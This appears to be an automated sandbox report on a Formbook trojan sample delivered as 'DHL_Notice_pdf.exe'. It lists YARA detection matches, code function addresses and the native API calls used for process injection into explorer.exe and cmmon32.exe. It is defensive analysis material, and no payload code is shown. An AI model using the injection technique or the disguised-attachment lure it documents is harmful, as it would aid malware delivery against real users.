Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Detected potential crypto function
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_00406D5F 0_2_00406D5F
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 1_2_004208B7 1_2_004208B7
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 1_2_00420A26 1_2_00420A26
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00405843 3_2_00405843
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00401801 3_2_00401801
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00401803 3_2_00401803
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00401810 3_2_00401810
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_004038C3 3_2_004038C3
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_004228C4 3_2_004228C4
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_004230E8 3_2_004230E8
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_004038B9 3_2_004038B9
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0042219B 3_2_0042219B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00401A65 3_2_00401A65
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00422211 3_2_00422211
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00421A8C 3_2_00421A8C
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00401BA0 3_2_00401BA0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_004223BA 3_2_004223BA
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0040561A 3_2_0040561A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00420623 3_2_00420623
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00405623 3_2_00405623
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00422EAB 3_2_00422EAB
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0040BFEE 3_2_0040BFEE
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0040BFF3 3_2_0040BFF3
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00421F81 3_2_00421F81
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A220A0 3_2_00A220A0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC20A8 3_2_00AC20A8
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0B090 3_2_00A0B090
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC28EC 3_2_00AC28EC
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ACE824 3_2_00ACE824
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A830 3_2_00A1A830
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB1002 3_2_00AB1002
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A199BF 3_2_00A199BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A14120 3_2_00A14120
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FF900 3_2_009FF900
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC22AE 3_2_00AC22AE
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4AEF 3_2_00AB4AEF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AAFA2B 3_2_00AAFA2B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B236 3_2_00A1B236
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2EBB0 3_2_00A2EBB0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2138B 3_2_00A2138B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AA23E3 3_2_00AA23E3
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB03DA 3_2_00AB03DA
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABDBD2 3_2_00ABDBD2
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2ABD8 3_2_00A2ABD8
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC2B28 3_2_00AC2B28
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1AB40 3_2_00A1AB40
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A9CB4F 3_2_00A9CB4F
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4496 3_2_00AB4496
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0841F 3_2_00A0841F
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABD466 3_2_00ABD466
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B477 3_2_00A1B477
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A22581 3_2_00A22581
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB2D82 3_2_00AB2D82
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0D5E0 3_2_00A0D5E0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC25DD 3_2_00AC25DD
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC2D07 3_2_00AC2D07
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F0D20 3_2_009F0D20
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC1D55 3_2_00AC1D55
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC2EF7 3_2_00AC2EF7
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A16E30 3_2_00A16E30
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABD616 3_2_00ABD616
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC1FF1 3_2_00AC1FF1
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ACDFCE 3_2_00ACDFCE
Source: C:\Windows\explorer.exe Code function: 4_2_0B738F52 4_2_0B738F52
Source: C:\Windows\explorer.exe Code function: 4_2_0B737D42 4_2_0B737D42
Source: C:\Windows\explorer.exe Code function: 4_2_0B735FA2 4_2_0B735FA2
Source: C:\Windows\explorer.exe Code function: 4_2_0B734C72 4_2_0B734C72
Source: C:\Windows\explorer.exe Code function: 4_2_0B733279 4_2_0B733279
Source: C:\Windows\explorer.exe Code function: 4_2_0B737262 4_2_0B737262
Source: C:\Windows\explorer.exe Code function: 4_2_0B737E62 4_2_0B737E62
Source: C:\Windows\explorer.exe Code function: 4_2_0B732C52 4_2_0B732C52
Source: C:\Windows\explorer.exe Code function: 4_2_0B737E5D 4_2_0B737E5D
Source: C:\Windows\explorer.exe Code function: 4_2_0B738202 4_2_0B738202
Source: C:\Windows\explorer.exe Code function: 4_2_0B739802 4_2_0B739802
Source: C:\Windows\explorer.exe Code function: 4_2_11944FA2 4_2_11944FA2
Source: C:\Windows\explorer.exe Code function: 4_2_11947F52 4_2_11947F52
Source: C:\Windows\explorer.exe Code function: 4_2_11946D42 4_2_11946D42
Source: C:\Windows\explorer.exe Code function: 4_2_11947202 4_2_11947202
Source: C:\Windows\explorer.exe Code function: 4_2_11948802 4_2_11948802
Source: C:\Windows\explorer.exe Code function: 4_2_11941C52 4_2_11941C52
Source: C:\Windows\explorer.exe Code function: 4_2_11946E5D 4_2_11946E5D
Source: C:\Windows\explorer.exe Code function: 4_2_11943C72 4_2_11943C72
Source: C:\Windows\explorer.exe Code function: 4_2_11942279 4_2_11942279
Source: C:\Windows\explorer.exe Code function: 4_2_11946262 4_2_11946262
Source: C:\Windows\explorer.exe Code function: 4_2_11946E62 4_2_11946E62
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045AD466 5_2_045AD466
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044F841F 5_2_044F841F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A4496 5_2_045A4496
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B1D55 5_2_045B1D55
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B2D07 5_2_045B2D07
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044E0D20 5_2_044E0D20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B25DD 5_2_045B25DD
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044FD5E0 5_2_044FD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04512581 5_2_04512581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A2D82 5_2_045A2D82
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045AD616 5_2_045AD616
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04506E30 5_2_04506E30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B2EF7 5_2_045B2EF7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045BDFCE 5_2_045BDFCE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B1FF1 5_2_045B1FF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A1002 5_2_045A1002
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0450A830 5_2_0450A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045BE824 5_2_045BE824
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B28EC 5_2_045B28EC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044FB090 5_2_044FB090
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045120A0 5_2_045120A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B20A8 5_2_045B20A8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044EF900 5_2_044EF900
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04504120 5_2_04504120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045099BF 5_2_045099BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0459FA2B 5_2_0459FA2B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A4AEF 5_2_045A4AEF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B22AE 5_2_045B22AE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0450AB40 5_2_0450AB40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0450A309 5_2_0450A309
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B2B28 5_2_045B2B28
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A03DA 5_2_045A03DA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045ADBD2 5_2_045ADBD2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451ABD8 5_2_0451ABD8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045923E3 5_2_045923E3
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451EBB0 5_2_0451EBB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027C8D70 5_2_027C8D70
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027C3A50 5_2_027C3A50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027CA200 5_2_027CA200
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027E12F5 5_2_027E12F5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027C1AD0 5_2_027C1AD0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027E0AD1 5_2_027E0AD1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027C1AC6 5_2_027C1AC6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027E03A8 5_2_027E03A8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027C3830 5_2_027C3830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DE830 5_2_027DE830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027C3827 5_2_027C3827
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027E10B8 5_2_027E10B8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027CA1FB 5_2_027CA1FB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027E018E 5_2_027E018E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DFC99 5_2_027DFC99
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: String function: 009FB150 appears 136 times
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 044EB150 appears 133 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041E533 NtCreateFile, 3_2_0041E533
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041E5E3 NtReadFile, 3_2_0041E5E3
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041E663 NtClose, 3_2_0041E663
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041E713 NtAllocateVirtualMemory, 3_2_0041E713
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041E52E NtCreateFile, 3_2_0041E52E
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041E5DD NtReadFile, 3_2_0041E5DD
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A398F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_00A398F0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00A39860
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39840 NtDelayExecution,LdrInitializeThunk, 3_2_00A39840
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A399A0 NtCreateSection,LdrInitializeThunk, 3_2_00A399A0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_00A39910
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39A20 NtResumeThread,LdrInitializeThunk, 3_2_00A39A20
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_00A39A00
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39A50 NtCreateFile,LdrInitializeThunk, 3_2_00A39A50
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A395D0 NtClose,LdrInitializeThunk, 3_2_00A395D0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39540 NtReadFile,LdrInitializeThunk, 3_2_00A39540
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A396E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00A396E0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_00A39660
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A397A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00A397A0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39780 NtMapViewOfSection,LdrInitializeThunk, 3_2_00A39780
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39FE0 NtCreateMutant,LdrInitializeThunk, 3_2_00A39FE0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39710 NtQueryInformationToken,LdrInitializeThunk, 3_2_00A39710
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A398A0 NtWriteVirtualMemory, 3_2_00A398A0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39820 NtEnumerateKey, 3_2_00A39820
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A3B040 NtSuspendThread, 3_2_00A3B040
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A399D0 NtCreateProcessEx, 3_2_00A399D0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39950 NtQueueApcThread, 3_2_00A39950
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39A80 NtOpenDirectoryObject, 3_2_00A39A80
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39A10 NtQuerySection, 3_2_00A39A10
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A3A3B0 NtGetContextThread, 3_2_00A3A3B0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39B00 NtSetValueKey, 3_2_00A39B00
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A395F0 NtQueryInformationFile, 3_2_00A395F0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39520 NtWaitForSingleObject, 3_2_00A39520
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A3AD30 NtSetContextThread, 3_2_00A3AD30
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39560 NtWriteFile, 3_2_00A39560
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A396D0 NtCreateKey, 3_2_00A396D0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39610 NtEnumerateValueKey, 3_2_00A39610
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39670 NtQueryInformationProcess, 3_2_00A39670
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39650 NtQueryValueKey, 3_2_00A39650
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39730 NtQueryVirtualMemory, 3_2_00A39730
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A3A710 NtOpenProcessToken, 3_2_00A3A710
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39760 NtOpenProcess, 3_2_00A39760
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39770 NtSetInformationFile, 3_2_00A39770
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A3A770 NtOpenThread, 3_2_00A3A770
